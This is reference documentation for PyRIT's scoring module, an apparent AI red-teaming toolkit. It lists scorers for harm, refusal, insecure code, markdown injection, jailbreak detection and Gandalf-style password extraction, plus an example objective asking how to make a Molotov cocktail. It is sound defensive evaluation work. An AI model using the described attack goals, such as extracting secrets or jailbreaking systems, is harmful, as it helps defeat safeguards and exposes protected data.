
pyrit.score

Scoring functionality for evaluating AI model responses across various dimensions including harm detection, objective completion, and content classification.

Functions

create_conversation_scorer

create_conversation_scorer(scorer: Scorer, validator: Optional[ScorerPromptValidator] = None) → Scorer

Create a ConversationScorer that inherits from the same type as the wrapped scorer.

This factory dynamically creates a ConversationScorer class that inherits from the wrapped scorer’s base class (FloatScaleScorer or TrueFalseScorer), ensuring the returned scorer is an instance of both ConversationScorer and the wrapped scorer’s type.

Parameters:
- scorer (Scorer): The scorer to wrap for conversation-level evaluation. Must be an instance of FloatScaleScorer or TrueFalseScorer.
- validator (Optional[ScorerPromptValidator]): Optional validator override. If not provided, uses the wrapped scorer's validator. Defaults to None.

Returns:

Raises:

get_all_harm_metrics

get_all_harm_metrics(harm_category: str) → list[ScorerMetricsWithIdentity[HarmScorerMetrics]]

Load all harm scorer metrics for a specific harm category.

Returns a list of ScorerMetricsWithIdentity[HarmScorerMetrics] objects that wrap the scorer’s identity information and its performance metrics, enabling clean attribute access like entry.metrics.mean_absolute_error or entry.metrics.harm_category.

Parameters:
- harm_category (str): The harm category to load metrics for (e.g., "hate_speech", "violence").

Returns:
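The attribute access pattern described above can be sketched with a small generic wrapper. The field names below are illustrative stand-ins for the registry types, chosen to match the `entry.metrics.mean_absolute_error` style of access:

```python
from dataclasses import dataclass
from typing import Generic, TypeVar

T = TypeVar("T")

# Hypothetical stand-in for HarmScorerMetrics; real fields may differ.
@dataclass
class HarmScorerMetrics:
    mean_absolute_error: float
    harm_category: str

# Sketch of a generic wrapper pairing scorer identity with its metrics.
@dataclass
class ScorerMetricsWithIdentity(Generic[T]):
    scorer_name: str  # simplified identity information
    metrics: T

entry = ScorerMetricsWithIdentity(
    scorer_name="ExampleHarmScorer",
    metrics=HarmScorerMetrics(mean_absolute_error=0.12, harm_category="hate_speech"),
)
assert entry.metrics.harm_category == "hate_speech"
```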

get_all_objective_metrics

get_all_objective_metrics(file_path: Optional[Path] = None) → list[ScorerMetricsWithIdentity[ObjectiveScorerMetrics]]

Load all objective scorer metrics with full scorer identity for comparison.

Returns a list of ScorerMetricsWithIdentity[ObjectiveScorerMetrics] objects that wrap the scorer’s identity information and its performance metrics, enabling clean attribute access like entry.metrics.accuracy or entry.metrics.f1_score.

Parameters:
- file_path (Optional[Path]): Path to a specific JSONL file to load. If not provided, uses the default path: SCORER_EVALS_PATH / "objective" / "objective_achieved_metrics.jsonl". Defaults to None.

Returns:

AudioFloatScaleScorer

Bases: FloatScaleScorer

A scorer that processes audio files by transcribing them and scoring the transcript.

The AudioFloatScaleScorer transcribes audio to text using Azure Speech-to-Text, then scores the transcript using a FloatScaleScorer.

Constructor Parameters:

- text_capable_scorer (FloatScaleScorer): A FloatScaleScorer capable of processing text. This scorer will be used to evaluate the transcribed audio content.
- validator (Optional[ScorerPromptValidator]): Validator for the scorer. Defaults to None, which uses the audio_path data type validator.
- use_entra_auth (Optional[bool]): Whether to use Entra ID authentication for Azure Speech. Defaults to None, which is treated as True.

AudioTrueFalseScorer

Bases: TrueFalseScorer

A scorer that processes audio files by transcribing them and scoring the transcript.

The AudioTrueFalseScorer transcribes audio to text using Azure Speech-to-Text, then scores the transcript using a TrueFalseScorer.

Constructor Parameters:

- text_capable_scorer (TrueFalseScorer): A TrueFalseScorer capable of processing text. This scorer will be used to evaluate the transcribed audio content.
- validator (Optional[ScorerPromptValidator]): Validator for the scorer. Defaults to None, which uses the audio_path data type validator.
- use_entra_auth (Optional[bool]): Whether to use Entra ID authentication for Azure Speech. Defaults to None, which is treated as True.

AzureContentFilterScorer

Bases: FloatScaleScorer

A scorer that uses Azure Content Safety API to evaluate text and images for harmful content.

This scorer analyzes content across multiple harm categories (hate, self-harm, sexual, violence) and returns a score for each category in the range [0, 1], where higher scores indicate more severe content. Supports both text and image inputs.

Constructor Parameters:

- endpoint (Optional[str]): The Azure Content Safety API endpoint. Defaults to None.
- api_key (Optional[str | Callable[[], str]]): The API key for the Azure Content Safety API, or a callable that returns one. Defaults to None.
- harm_categories (Optional[list[TextCategory]]): The harm categories you want to query for as defined in azure.ai.contentsafety.models.TextCategory. If not provided, defaults to all categories. Defaults to None.
- validator (Optional[ScorerPromptValidator]): Custom validator for the scorer. Defaults to None.

Methods:

evaluate_async

evaluate_async(file_mapping: Optional[ScorerEvalDatasetFiles] = None, num_scorer_trials: int = 3, update_registry_behavior: RegistryUpdateBehavior = None, max_concurrency: int = 10) → Optional[ScorerMetrics]

Evaluate this scorer against human-labeled datasets.

AzureContentFilterScorer requires exactly one harm category to be configured for evaluation. This ensures each score corresponds to exactly one category in the ground truth dataset.

Parameters:
- file_mapping (Optional[ScorerEvalDatasetFiles]): Optional ScorerEvalDatasetFiles configuration. If not provided, uses the mapping based on the configured harm category. Defaults to None.
- num_scorer_trials (int): Number of times to score each response. Defaults to 3.
- update_registry_behavior (RegistryUpdateBehavior): Controls how existing registry entries are handled. SKIP_IF_EXISTS (default): check the registry for existing results and return cached metrics if found. ALWAYS_UPDATE: always run evaluation and overwrite any existing registry entry. NEVER_UPDATE: always run evaluation but never write to the registry (for debugging). Defaults to RegistryUpdateBehavior.SKIP_IF_EXISTS.
- max_concurrency (int): Maximum concurrent scoring requests. Defaults to 10.

Returns:

Raises:

BatchScorer

A utility class for scoring prompts in batches in a parallelizable and convenient way.

This class provides functionality to score existing prompts stored in memory without any target interaction, making it a pure scoring utility.

Constructor Parameters:

- batch_size (int): The maximum batch size for sending prompts. Defaults to 10. Note: if using a scorer that takes a prompt target and providing max requests per minute on the target, this should be set to 1 to ensure proper rate limit management.

Methods:

score_responses_by_filters_async

score_responses_by_filters_async(scorer: Scorer, attack_id: Optional[str | uuid.UUID] = None, conversation_id: Optional[str | uuid.UUID] = None, prompt_ids: Optional[list[str] | list[uuid.UUID]] = None, labels: Optional[dict[str, str]] = None, sent_after: Optional[datetime] = None, sent_before: Optional[datetime] = None, original_values: Optional[list[str]] = None, converted_values: Optional[list[str]] = None, data_type: Optional[str] = None, not_data_type: Optional[str] = None, converted_value_sha256: Optional[list[str]] = None, objective: str = '') → list[Score]

Score the responses that match the specified filters.

Parameters:
- scorer (Scorer): The Scorer object to use for scoring.
- attack_id (Optional[str | uuid.UUID]): The attack ID to filter by. Defaults to None.
- conversation_id (Optional[str | uuid.UUID]): The conversation ID to filter by. Defaults to None.
- prompt_ids (Optional[list[str] | list[uuid.UUID]]): A list of prompt IDs to filter by. Defaults to None.
- labels (Optional[dict[str, str]]): A dictionary of labels. Defaults to None.
- sent_after (Optional[datetime]): Filter for prompts sent after this datetime. Defaults to None.
- sent_before (Optional[datetime]): Filter for prompts sent before this datetime. Defaults to None.
- original_values (Optional[list[str]]): A list of original values. Defaults to None.
- converted_values (Optional[list[str]]): A list of converted values. Defaults to None.
- data_type (Optional[str]): The data type to filter by. Defaults to None.
- not_data_type (Optional[str]): The data type to exclude. Defaults to None.
- converted_value_sha256 (Optional[list[str]]): A list of SHA256 hashes of converted values. Defaults to None.
- objective (str): A task used to give the scorer more context on what exactly to score. A task might be the request prompt text or the original attack model's objective. Note: the same task is applied to all matched prompts. Defaults to an empty string.

Returns:

Raises:

ConsoleScorerPrinter

Bases: ScorerPrinter

Console printer for scorer information with enhanced formatting.

This printer formats scorer details for console display with optional color coding, proper indentation, and visual hierarchy. Colors can be disabled for consoles that don’t support ANSI characters.

Constructor Parameters:

- indent_size (int): Number of spaces for indentation. Must be non-negative. Defaults to 2.
- enable_colors (bool): Whether to enable ANSI color output. When False, all output will be plain text without colors. Defaults to True.

Methods:

print_harm_scorer(scorer_identifier: ComponentIdentifier, harm_category: str) → None

Print harm scorer information including type, nested scorers, and evaluation metrics.

This method displays:

Parameters:
- scorer_identifier (ComponentIdentifier): The scorer identifier to print information for.
- harm_category (str): The harm category for looking up metrics (e.g., "hate_speech", "violence").

print_objective_scorer(scorer_identifier: ComponentIdentifier) → None

Print objective scorer information including type, nested scorers, and evaluation metrics.

This method displays:

Parameters:
- scorer_identifier (ComponentIdentifier): The scorer identifier to print information for.

ContentClassifierPaths

Bases: enum.Enum

Paths to content classifier YAML files.

ConversationScorer

Bases: Scorer, ABC

Scorer that evaluates entire conversation history rather than individual messages.

This scorer wraps another scorer (FloatScaleScorer or TrueFalseScorer) and evaluates the full conversation context. Useful for multi-turn conversations where context matters (e.g., psychosocial harms that emerge over time or persuasion/deception over many messages).

The ConversationScorer dynamically inherits from the same base class as the wrapped scorer, ensuring proper type compatibility.

Note: This class cannot be instantiated directly. Use create_conversation_scorer() factory instead.

Methods:

validate_return_scores

validate_return_scores(scores: list[Score]) → None

Validate scores by delegating to the wrapped scorer’s validation.

Parameters:
- scores (list[Score]): The scores to validate.

DecodingScorer

Bases: TrueFalseScorer

Scorer that checks if the request values are in the output using a text matching strategy.

This scorer checks if any of the user request values (original_value, converted_value, or metadata decoded_text) match the response converted_value using the configured text matching strategy.

Constructor Parameters:

- text_matcher (Optional[TextMatching]): The text matching strategy to use. Defaults to None, which uses ExactTextMatching with case_sensitive=False.
- categories (Optional[list[str]]): Optional list of categories for the score. Defaults to None.
- aggregator (TrueFalseAggregatorFunc): The aggregator function to use. Defaults to TrueFalseScoreAggregator.OR.
- validator (Optional[ScorerPromptValidator]): Custom validator. Defaults to None.
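The default matching behavior (exact matching, case-insensitive, against any of the request values) can be sketched as follows. The function name and the equality-based strategy are assumptions based on the ExactTextMatching default described above:

```python
# Sketch of case-insensitive exact matching between any request value
# (original_value, converted_value, or decoded_text) and the response value.
def decoding_match(request_values, response_value, case_sensitive=False):
    def norm(s):
        return s if case_sensitive else s.lower()
    return any(norm(v) == norm(response_value) for v in request_values)

assert decoding_match(["SECRET", "c2VjcmV0"], "secret") is True
```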

FloatScaleScoreAggregator

Namespace for float scale score aggregators that return a single aggregated score.

All aggregators return a list containing one ScoreAggregatorResult that combines all input scores together, preserving all categories.
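The "combine all scores, preserve all categories" behavior can be sketched as a simple function over (value, category) pairs. This is an illustration of the aggregation idea, not PyRIT's implementation:

```python
# Sketch of a MAX-style float scale aggregator: one combined value,
# with the union of all input categories preserved.
def aggregate_max(scores):
    # scores: list of (value, category) pairs with values in [0, 1]
    value = max(v for v, _ in scores)
    categories = sorted({c for _, c in scores})
    return value, categories

assert aggregate_max([(0.2, "hate"), (0.7, "violence")]) == (0.7, ["hate", "violence"])
```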

FloatScaleScorer

Bases: Scorer

Base class for scorers that return floating-point scores in the range [0, 1].

This scorer evaluates prompt responses and returns numeric scores indicating the degree to which a response exhibits certain characteristics. Each piece in a request response is scored independently, returning one score per piece.

Constructor Parameters:

- validator (ScorerPromptValidator): A validator object used to validate scores.

Methods:

get_scorer_metrics

get_scorer_metrics() → Optional[HarmScorerMetrics]

Get evaluation metrics for this scorer from the configured evaluation result file.

Returns:

validate_return_scores

validate_return_scores(scores: list[Score]) → None

Validate that the returned scores are within the valid range [0, 1].

Raises:

FloatScaleScorerAllCategories

Namespace for float scale score aggregators that combine all categories.

These aggregators ignore category boundaries and aggregate all scores together, returning a single ScoreAggregatorResult with all categories combined.

FloatScaleScorerByCategory

Namespace for float scale score aggregators that group by category.

These aggregators return multiple ScoreAggregatorResult objects (one per category). Useful for scorers like AzureContentFilterScorer that return multiple scores per item.

FloatScaleThresholdScorer

Bases: TrueFalseScorer

A scorer that applies a threshold to a float scale score to make it a true/false score.

Constructor Parameters:

- scorer (FloatScaleScorer): The underlying float scale scorer to use.
- threshold (float): The threshold value between 0 and 1. Scores >= threshold are True, otherwise False.
- float_scale_aggregator (FloatScaleAggregatorFunc): The aggregator function to use for combining multiple float scale scores. Defaults to FloatScaleScoreAggregator.MAX.
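The thresholding rule is simple enough to state directly: aggregate the float scores (MAX by default), then compare against the threshold. A minimal sketch, not the PyRIT implementation:

```python
# Sketch of the FloatScaleThresholdScorer rule: aggregated score >= threshold -> True.
def threshold_score(float_scores, threshold, aggregator=max):
    return aggregator(float_scores) >= threshold

assert threshold_score([0.3, 0.8], threshold=0.7) is True
assert threshold_score([0.3, 0.5], threshold=0.7) is False
```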

GandalfScorer

Bases: TrueFalseScorer

A scorer for evaluating responses in Gandalf challenges.

This scorer checks whether a password or secret has been successfully extracted from a Gandalf-style challenge by submitting the response to the Gandalf API and checking if the password is correct. Returns True if the password was successfully extracted.

Constructor Parameters:

- level (GandalfLevel): The Gandalf challenge level to score against.
- chat_target (PromptChatTarget): The chat target used for password extraction.
- validator (Optional[ScorerPromptValidator]): Custom validator. Defaults to None, which uses the text data type validator.
- score_aggregator (TrueFalseAggregatorFunc): Aggregator for combining scores. Defaults to TrueFalseScoreAggregator.OR.

HarmHumanLabeledEntry

Bases: HumanLabeledEntry

A class that represents a human-labeled dataset entry for a specific harm category. This class includes the Messages and a list of human scores, which are floats between 0.0 and 1.0 inclusive, representing the degree of harm severity where 0.0 is minimal and 1.0 is maximal. The harm category is a string that represents the type of harm (e.g., “hate_speech”, “misinformation”, etc.).

HarmScorerEvaluator

Bases: ScorerEvaluator

A class that evaluates a harm scorer against HumanLabeledDatasets of type HARM.

HarmScorerMetrics

Bases: ScorerMetrics

Metrics for evaluating a harm scorer against a HumanLabeledDataset.

Methods:

get_harm_definition

get_harm_definition() → Optional[HarmDefinition]

Load and return the HarmDefinition object for this metrics instance.

Loads the harm definition YAML file specified in harm_definition and returns it as a HarmDefinition object. The result is cached after the first load.

Returns:

Raises:

HumanInTheLoopScorerGradio

Bases: TrueFalseScorer

Creates scores from manual human input using Gradio and adds them to the database.

In the future this will not be a TrueFalseScorer, but it is all that is currently supported.

Deprecated: This Gradio-based scorer is deprecated and will be removed in v0.13.0. Use the React-based GUI instead.

Constructor Parameters:

- open_browser (bool): If True, the scorer will open the Gradio interface in a browser instead of opening it in PyWebview. Defaults to False.
- validator (Optional[ScorerPromptValidator]): Custom validator. Defaults to None.
- score_aggregator (TrueFalseAggregatorFunc): Aggregator for combining scores. Defaults to TrueFalseScoreAggregator.OR.

Methods:

retrieve_score

retrieve_score(request_prompt: MessagePiece, objective: Optional[str] = None) → list[Score]

Retrieve a score from the human evaluator through the RPC server.

Parameters:
- request_prompt (MessagePiece): The message piece to be scored.
- objective (Optional[str]): The objective to evaluate against. Defaults to None.

Returns:

HumanLabeledDataset

A class that represents a human-labeled dataset, including the entries and each of their corresponding human scores. This dataset is used to evaluate PyRIT scorer performance via the ScorerEvaluator class. HumanLabeledDatasets can be constructed from a CSV file.

Constructor Parameters:

- name (str): The name of the human-labeled dataset. For datasets of uniform type, this is often the harm category (e.g., hate_speech) or objective. It will be used in the naming of metrics (JSON) and model scores (CSV) files when evaluation is run on this dataset.
- entries (List[HumanLabeledEntry]): A list of entries in the dataset.
- metrics_type (MetricsType): The type of the human-labeled dataset, either HARM or OBJECTIVE.
- version (str): The version of the human-labeled dataset.
- harm_definition (str): Path to the harm definition YAML file for HARM datasets. Defaults to None.
- harm_definition_version (str): Version of the harm definition YAML file. Used to ensure the human labels match the scoring criteria version. Defaults to None.

Methods:

from_csv

from_csv(csv_path: Union[str, Path], metrics_type: MetricsType, dataset_name: Optional[str] = None, version: Optional[str] = None, harm_definition: Optional[str] = None, harm_definition_version: Optional[str] = None) → HumanLabeledDataset

Load a human-labeled dataset from a CSV file with standard column names.

Expected CSV format:

You can optionally include a # comment line at the top of the CSV file to specify the dataset version and harm definition path.

Parameters:
- csv_path (Union[str, Path]): The path to the CSV file.
- metrics_type (MetricsType): The type of the human-labeled dataset, either HARM or OBJECTIVE.
- dataset_name (Optional[str]): The name of the dataset. If not provided, it will be inferred from the CSV file name. Defaults to None.
- version (Optional[str]): The version of the dataset. If not provided here, it will be inferred from the CSV file if a dataset_version comment line is present. Defaults to None.
- harm_definition (Optional[str]): Path to the harm definition YAML file. If not provided here, it will be inferred from the CSV file if a harm_definition comment is present. Defaults to None.
- harm_definition_version (Optional[str]): Version of the harm definition YAML file. If not provided here, it will be inferred from the CSV file if a harm_definition_version comment is present. Defaults to None.

Returns:

Raises:

get_harm_definition

get_harm_definition() → Optional[HarmDefinition]

Load and return the HarmDefinition object for this dataset.

For HARM datasets, this loads the harm definition YAML file specified in harm_definition and returns it as a HarmDefinition object. The result is cached after the first load.

Returns:

Raises:

validate

validate() → None

Validate that the dataset is internally consistent.

Checks that all entries match the dataset’s metrics_type and, for HARM datasets, that all entries have the same harm_category, that harm_definition is specified, and that the harm definition file exists and is loadable.

Raises:

HumanLabeledEntry

A class that represents an entry in a dataset of assistant responses that have been scored by humans. It is used to evaluate PyRIT scorer performance as measured by degree of alignment with human labels. This class includes the Messages and a list of human-assigned scores, which are floats between 0.0 and 1.0 inclusive (representing degree of severity) for harm datasets, and booleans for objective datasets.

InsecureCodeScorer

Bases: FloatScaleScorer

A scorer that uses an LLM to evaluate code snippets for potential security vulnerabilities. Configuration is loaded from a YAML file for dynamic prompts and instructions.

Constructor Parameters:

- chat_target (PromptChatTarget): The target to use for scoring code security.
- system_prompt_path (Optional[Union[str, Path]]): Path to the YAML file containing the system prompt. Defaults to None, which uses the default insecure code scoring prompt.
- validator (Optional[ScorerPromptValidator]): Custom validator for the scorer. Defaults to None.

LikertScaleEvalFiles

Configuration for evaluating a Likert scale scorer on a set of dataset files.

LikertScalePaths

Bases: enum.Enum

Enum containing Likert scale configurations including YAML paths and evaluation file mappings.

Each enum value is a tuple of (yaml_path, evaluation_files) where:

MarkdownInjectionScorer

Bases: TrueFalseScorer

A scorer that detects markdown injection attempts in text responses.

This scorer checks for the presence of markdown syntax patterns that could be used for injection attacks, such as links, images, or other markdown constructs that might be exploited. Returns True if markdown injection is detected.

Constructor Parameters:

- validator (Optional[ScorerPromptValidator]): Custom validator. Defaults to None.
- score_aggregator (TrueFalseAggregatorFunc): The aggregator function to use. Defaults to TrueFalseScoreAggregator.OR.
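A minimal sketch of this kind of detection: search for markdown link and image syntax with a regular expression. The pattern below is an assumption for illustration; the actual pattern set used by MarkdownInjectionScorer may differ:

```python
import re

# Matches markdown links [text](url) and images ![alt](url), which are the
# constructs most commonly abused for data exfiltration via rendered output.
MARKDOWN_PATTERN = re.compile(r"!?\[[^\]]*\]\([^)]*\)")

def contains_markdown_injection(text: str) -> bool:
    return bool(MARKDOWN_PATTERN.search(text))

assert contains_markdown_injection("See ![exfil](http://evil.example/?q=data)") is True
assert contains_markdown_injection("plain text response") is False
```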

MetricsType

Bases: Enum

Enum representing the type of metrics when evaluating scorers on human-labeled datasets.

ObjectiveHumanLabeledEntry

Bases: HumanLabeledEntry

A class that represents a human-labeled dataset entry for a specific objective. This class includes the Messages and a list of human scores, which are booleans indicating whether the response/conversation meets the objective (e.g., 0 for not meeting the objective, 1 for meeting the objective). The objective is a string that represents the objective (e.g., "how to make a Molotov cocktail?").

ObjectiveScorerEvaluator

Bases: ScorerEvaluator

A class that evaluates an objective scorer against HumanLabeledDatasets of type OBJECTIVE.

ObjectiveScorerMetrics

Bases: ScorerMetrics

Metrics for evaluating an objective scorer against a HumanLabeledDataset.

PlagiarismMetric

Bases: Enum

Enum representing different plagiarism detection metrics.

PlagiarismScorer

Bases: FloatScaleScorer

A scorer that measures plagiarism by computing word-level similarity between the AI response and a reference text.

This scorer implements three similarity metrics:

  1. Word-level longest common subsequence (LCS)

  2. Word-level Levenshtein similarity

  3. Word-level n-gram Jaccard similarity
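The three word-level metrics above can be sketched in plain Python. The normalizations here (lowercasing, whitespace tokenization, dividing LCS length by the reference length) are assumptions; the PyRIT implementation may normalize differently:

```python
def _words(text):
    return text.lower().split()

def lcs_similarity(response, reference):
    # Classic dynamic-programming longest common subsequence over words,
    # normalized by the reference length (an assumed normalization).
    a, b = _words(response), _words(reference)
    dp = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i, wa in enumerate(a):
        for j, wb in enumerate(b):
            dp[i + 1][j + 1] = dp[i][j] + 1 if wa == wb else max(dp[i][j + 1], dp[i + 1][j])
    return dp[len(a)][len(b)] / max(len(b), 1)

def levenshtein_similarity(response, reference):
    # Word-level edit distance converted to a similarity in [0, 1].
    a, b = _words(response), _words(reference)
    prev = list(range(len(b) + 1))
    for i, wa in enumerate(a, 1):
        cur = [i] + [0] * len(b)
        for j, wb in enumerate(b, 1):
            cur[j] = min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (wa != wb))
        prev = cur
    return 1 - prev[len(b)] / max(len(a), len(b), 1)

def ngram_jaccard(response, reference, n=5):
    # Jaccard overlap of word n-gram sets.
    def grams(ws):
        return {tuple(ws[i:i + n]) for i in range(len(ws) - n + 1)}
    ga, gb = grams(_words(response)), grams(_words(reference))
    return len(ga & gb) / max(len(ga | gb), 1)

ref = "the quick brown fox jumps over the lazy dog"
assert lcs_similarity("the quick brown fox sleeps", ref) == 4 / 9
```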

Constructor Parameters:

- reference_text (str): The reference text to compare against.
- metric (PlagiarismMetric): The plagiarism detection metric to use. Defaults to PlagiarismMetric.LCS.
- n (int): The n-gram size for n-gram similarity. Defaults to 5.
- validator (Optional[ScorerPromptValidator]): Custom validator for the scorer. Defaults to None.

PromptShieldScorer

Bases: TrueFalseScorer

Returns true if an attack or jailbreak has been detected by Prompt Shield.

Constructor Parameters:

- prompt_shield_target (PromptShieldTarget): The Prompt Shield target to use for scoring.
- validator (Optional[ScorerPromptValidator]): Custom validator. Defaults to None.
- score_aggregator (TrueFalseAggregatorFunc): The aggregator function to use. Defaults to TrueFalseScoreAggregator.OR.

QuestionAnswerScorer

Bases: TrueFalseScorer

A class that represents a question answering scorer.

Constructor Parameters:

- correct_answer_matching_patterns (list[str]): A list of patterns to check for in the response. If any pattern is found in the response, the score will be True. These patterns should be format strings that will be formatted with the correct answer metadata. Defaults to CORRECT_ANSWER_MATCHING_PATTERNS.
- category (Optional[list[str]]): Optional list of categories for the score. Defaults to None.
- validator (Optional[ScorerPromptValidator]): Custom validator. Defaults to None.
- score_aggregator (TrueFalseAggregatorFunc): The aggregator function to use. Defaults to TrueFalseScoreAggregator.OR.
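The format-string matching rule can be sketched as below. The example patterns are illustrative stand-ins, not PyRIT's CORRECT_ANSWER_MATCHING_PATTERNS:

```python
# Sketch: each pattern is a format string filled in with the correct answer,
# then searched for in the (lowercased) response. Any hit yields True.
def question_answer_match(response, correct_answer, patterns=("answer is {}", "{}")):
    response = response.lower()
    return any(p.format(correct_answer).lower() in response for p in patterns)

assert question_answer_match("The answer is Paris.", "Paris") is True
assert question_answer_match("I don't know.", "Paris") is False
```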

RefusalScorerPaths

Bases: enum.Enum

Paths to refusal scorer system prompt YAML files.

Each enum value represents a different refusal detection strategy:

RegistryUpdateBehavior

Bases: Enum

Enum representing how the evaluation registry should be updated.

Scorer

Bases: Identifiable, abc.ABC

Abstract base class for scorers.

Constructor Parameters:

- validator (ScorerPromptValidator): Validator for message pieces and scorer configuration.

Methods:

evaluate_async

evaluate_async(file_mapping: Optional[ScorerEvalDatasetFiles] = None, num_scorer_trials: int = 3, update_registry_behavior: RegistryUpdateBehavior = None, max_concurrency: int = 10) → Optional[ScorerMetrics]

Evaluate this scorer against human-labeled datasets.

Uses file mapping to determine which datasets to evaluate and how to aggregate results.

Parameters:
- file_mapping (Optional[ScorerEvalDatasetFiles]): Optional ScorerEvalDatasetFiles configuration. If not provided, uses the scorer's configured evaluation_file_mapping, which maps input file patterns to an output result file. Defaults to None.
- num_scorer_trials (int): Number of times to score each response (for measuring variance). Defaults to 3.
- update_registry_behavior (RegistryUpdateBehavior): Controls how existing registry entries are handled. SKIP_IF_EXISTS (default): check the registry for existing results and return cached metrics if found. ALWAYS_UPDATE: always run evaluation and overwrite any existing registry entry. NEVER_UPDATE: always run evaluation but never write to the registry (for debugging). Defaults to RegistryUpdateBehavior.SKIP_IF_EXISTS.
- max_concurrency (int): Maximum number of concurrent scoring requests. Defaults to 10.

Returns:

Raises:

get_identifier

get_identifier() → ComponentIdentifier

Get the scorer’s identifier with eval_hash always attached.

Overrides the base Identifiable.get_identifier() so that to_dict() always emits the eval_hash key.

Returns:

get_scorer_metrics

get_scorer_metrics() → Optional[ScorerMetrics]

Get evaluation metrics for this scorer from the configured evaluation result file.

Looks up metrics by this scorer’s identity hash in the JSONL result file. The result file may contain entries for multiple scorer configurations.

Subclasses must implement this to return the appropriate metrics type:

Returns:

scale_value_float

scale_value_float(value: float, min_value: float, max_value: float) → float

Scales a value into the range [0, 1] based on the given min and max values; e.g., 3 stars on a 1-to-5-star scale becomes 0.5.

Parameters:
- value (float): The value to be scaled.
- min_value (float): The minimum value of the range.
- max_value (float): The maximum value of the range.

Returns:
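The scaling described above is a standard linear rescaling, which can be written directly (the degenerate-range guard is an assumption for illustration):

```python
# Linear rescaling: (value - min) / (max - min), so 3 stars on a
# 1-to-5-star scale maps to 0.5.
def scale_value_float(value, min_value, max_value):
    if max_value == min_value:
        return 0.0  # assumed guard against a degenerate range
    return (value - min_value) / (max_value - min_value)

assert scale_value_float(3, 1, 5) == 0.5
```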

score_async

score_async(message: Message, objective: Optional[str] = None, role_filter: Optional[ChatMessageRole] = None, skip_on_error_result: bool = False, infer_objective_from_request: bool = False) → list[Score]

Score the message, add the results to the database, and return a list of Score objects.

Parameters:
- message (Message): The message to be scored.
- objective (Optional[str]): The task or objective based on which the message should be scored. Defaults to None.
- role_filter (Optional[ChatMessageRole]): Only score messages with this exact stored role. Use "assistant" to score only real assistant responses, or "simulated_assistant" to score only simulated responses. Defaults to None (no filtering).
- skip_on_error_result (bool): If True, skip scoring if the message contains an error. Defaults to False.
- infer_objective_from_request (bool): If True, infer the objective from the message's previous request when objective is not provided. Defaults to False.

Returns:

Raises:

score_image_async

score_image_async(image_path: str, objective: Optional[str] = None) → list[Score]

Score the given image using the chat target.

Parameters:
- image_path (str): The path to the image file to be scored.
- objective (Optional[str]): The objective based on which the image should be scored. Defaults to None.

Returns:

score_image_batch_async

score_image_batch_async(image_paths: Sequence[str], objectives: Optional[Sequence[str]] = None, batch_size: int = 10) → list[Score]

Score a batch of images asynchronously.

Parameters:
- image_paths (Sequence[str]): Sequence of paths to image files to be scored.
- objectives (Optional[Sequence[str]]): Optional sequence of objectives corresponding to each image. If provided, must match the length of image_paths. Defaults to None.
- batch_size (int): Maximum number of images to score concurrently. Defaults to 10.

Returns:

Raises:

score_prompts_batch_async

score_prompts_batch_async(messages: Sequence[Message], objectives: Optional[Sequence[str]] = None, batch_size: int = 10, role_filter: Optional[ChatMessageRole] = None, skip_on_error_result: bool = False, infer_objective_from_request: bool = False) → list[Score]

Score multiple prompts in batches using the provided objectives.

Parameters:
- messages (Sequence[Message]): The messages to be scored.
- objectives (Optional[Sequence[str]]): The objectives/tasks based on which the prompts should be scored. Must have the same length as messages. Defaults to None.
- batch_size (int): The maximum batch size for processing prompts. Defaults to 10.
- role_filter (Optional[ChatMessageRole]): If provided, only score pieces with this role. Defaults to None (no filtering).
- skip_on_error_result (bool): If True, skip scoring pieces that have errors. Defaults to False.
- infer_objective_from_request (bool): If True and the objective is empty, attempt to infer the objective from the request. Defaults to False.

Returns:

Raises:

score_response_async

score_response_async(response: Message, objective_scorer: Optional[Scorer] = None, auxiliary_scorers: Optional[list[Scorer]] = None, role_filter: ChatMessageRole = 'assistant', objective: Optional[str] = None, skip_on_error_result: bool = True) → dict[str, list[Score]]

Score a response using an objective scorer and optional auxiliary scorers.

Parameters:
- response (Message): Response containing pieces to score.
- objective_scorer (Optional[Scorer]): The main scorer to determine success. Defaults to None.
- auxiliary_scorers (Optional[List[Scorer]]): List of auxiliary scorers to apply. Defaults to None.
- role_filter (ChatMessageRole): Only score pieces with this exact stored role. Defaults to "assistant" (real responses only, not simulated).
- objective (Optional[str]): Task/objective for scoring context. Defaults to None.
- skip_on_error_result (bool): If True, skip scoring pieces that have errors. Defaults to True.

Returns:

Raises:

score_response_multiple_scorers_async

score_response_multiple_scorers_async(response: Message, scorers: list[Scorer], role_filter: ChatMessageRole = 'assistant', objective: Optional[str] = None, skip_on_error_result: bool = True) → list[Score]

Score a response using multiple scorers in parallel.

This method applies each scorer to the first scorable response piece (filtered by role and error), and returns all scores. This is typically used for auxiliary scoring where all results are needed.

| Parameter | Type | Description |
| --- | --- | --- |
| response | `Message` | The response containing pieces to score. |
| scorers | `list[Scorer]` | List of scorers to apply. |
| role_filter | `ChatMessageRole` | Only score pieces with this exact stored role. Defaults to "assistant" (real responses only, not simulated). |
| objective | `Optional[str]` | Optional objective description for scoring context. Defaults to None. |
| skip_on_error_result | `bool` | If True, skip scoring pieces that have errors. Defaults to True. |

Returns:

score_text_async

score_text_async(text: str, objective: Optional[str] = None) → list[Score]

Scores the given text based on the task using the chat target.

| Parameter | Type | Description |
| --- | --- | --- |
| text | `str` | The text to be scored. |
| objective | `Optional[str]` | The task based on which the text should be scored. Defaults to None. |

Returns:

validate_return_scores

validate_return_scores(scores: list[Score]) → None

Validate the scores returned by the scorer, as some scorers require specific Score types or values.

| Parameter | Type | Description |
| --- | --- | --- |
| scores | `list[Score]` | The scores to be validated. |

ScorerEvalDatasetFiles

Configuration for evaluating a scorer on a set of dataset files.

Maps input dataset files (via glob patterns) to an output result file. Multiple files matching the patterns will be concatenated before evaluation.
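
The glob-to-concatenation behavior can be illustrated with a small sketch (the CSV layout and file names are invented for the example; they are not PyRIT's actual dataset format):

```python
import csv
from pathlib import Path
from tempfile import TemporaryDirectory


def load_and_concatenate(dataset_dir: Path, patterns: list[str]) -> list[dict]:
    # Collect every row from every CSV file matching any of the glob patterns,
    # concatenating them into one in-memory dataset before evaluation.
    rows: list[dict] = []
    for pattern in patterns:
        for file in sorted(dataset_dir.glob(pattern)):
            with file.open(newline="") as f:
                rows.extend(csv.DictReader(f))
    return rows


with TemporaryDirectory() as tmp:
    root = Path(tmp)
    (root / "harm_a.csv").write_text("text,label\nhi,0\n")
    (root / "harm_b.csv").write_text("text,label\nbye,1\n")
    combined = load_and_concatenate(root, ["harm_*.csv"])
```

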